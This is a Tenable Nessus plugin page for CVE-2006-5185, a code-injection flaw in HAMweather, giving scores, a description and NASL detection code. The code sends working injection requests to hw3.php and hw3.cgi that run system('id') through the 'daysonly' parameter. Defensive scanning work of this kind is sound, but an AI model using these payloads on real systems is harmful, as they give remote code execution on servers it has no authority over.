7.5 High
CVSS2
Attack Vector
NETWORK
Attack Complexity
LOW
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
PARTIAL
Availability Impact
PARTIAL
AV:N/AC:L/Au:N/C:P/I:P/A:P
0.096 Low
EPSS
Percentile
94.8%
The remote host is running HAMweather, a weather-forecasting software application.
The installed version of HAMweather fails to properly sanitize input to the ‘daysonly’ parameter before using it to evaluate PHP or Perl code. An unauthenticated attacker can leverage this issue to execute arbitrary code on the remote host subject to the privileges of the web server user id.
#%NASL_MIN_LEVEL 70300
#
# (C) Tenable Network Security, Inc.
#
include('deprecated_nasl_level.inc');
include('compat.inc');
if (description)
{
script_id(22497);
script_version("1.13");
script_set_attribute(attribute:"plugin_modification_date", value:"2022/04/11");
script_cve_id("CVE-2006-5185");
script_bugtraq_id(20311);
script_name(english:"HAMweather Template.php do_parse_code Function Arbitrary Code Execution");
script_set_attribute(attribute:"synopsis", value:
"The remote web server contains an application that allows execution of
arbitrary code.");
script_set_attribute(attribute:"description", value:
"The remote host is running HAMweather, a weather-forecasting software
application.
The installed version of HAMweather fails to properly sanitize input
to the 'daysonly' parameter before using it to evaluate PHP or Perl
code. An unauthenticated attacker can leverage this issue to execute
arbitrary code on the remote host subject to the privileges of the web
server user id.");
script_set_attribute(attribute:"see_also", value:"http://www.gulftech.org/?node=research&article_id=00115-09302006");
script_set_attribute(attribute:"see_also", value:"http://support.hamweather.com/viewtopic.php?t=6548");
script_set_attribute(attribute:"solution", value:
"Upgrade to HAMweather 3.9.8.2 Perl/ASP or HAMweather 3.9.8.5 PHP or
later.");
script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P");
script_set_cvss_temporal_vector("CVSS2#E:F/RL:OF/RC:C");
script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
script_set_attribute(attribute:"exploit_available", value:"true");
script_set_attribute(attribute:"vuln_publication_date", value:"2006/09/30");
script_set_attribute(attribute:"plugin_publication_date", value:"2006/10/04");
script_set_attribute(attribute:"plugin_type", value:"remote");
script_set_attribute(attribute:"thorough_tests", value:"true");
script_end_attributes();
script_category(ACT_ATTACK);
script_family(english:"CGI abuses");
script_copyright(english:"This script is Copyright (C) 2006-2022 Tenable Network Security, Inc.");
script_dependencies("http_version.nasl");
script_exclude_keys("Settings/disable_cgi_scanning");
script_require_ports("Services/www", 80);
exit(0);
}
include("global_settings.inc");
include("misc_func.inc");
include("http.inc");
port = get_http_port(default:80);
# Loop through directories.
if (thorough_tests) extra_dirs = make_list("/weather", "/hw3");
else extra_dirs = make_list();
# Try to exploit the flaw to run a command.
cmd = "id";
# - PHP variant.
http_check_remote_code(
extra_dirs : extra_dirs,
check_request : string("/hw3.php?daysonly=0).system(", cmd, ").("),
check_result : "uid=[0-9]+.*gid=[0-9]+.*",
command : cmd,
port : port
);
# - PERL variant.
http_check_remote_code(
extra_dirs : extra_dirs,
check_request : string("/hw3.cgi?daysonly=0).system('", cmd, "').("),
check_result : "uid=[0-9]+.*gid=[0-9]+.*",
command : cmd,
port : port
);
# - ASP variant (to be determined).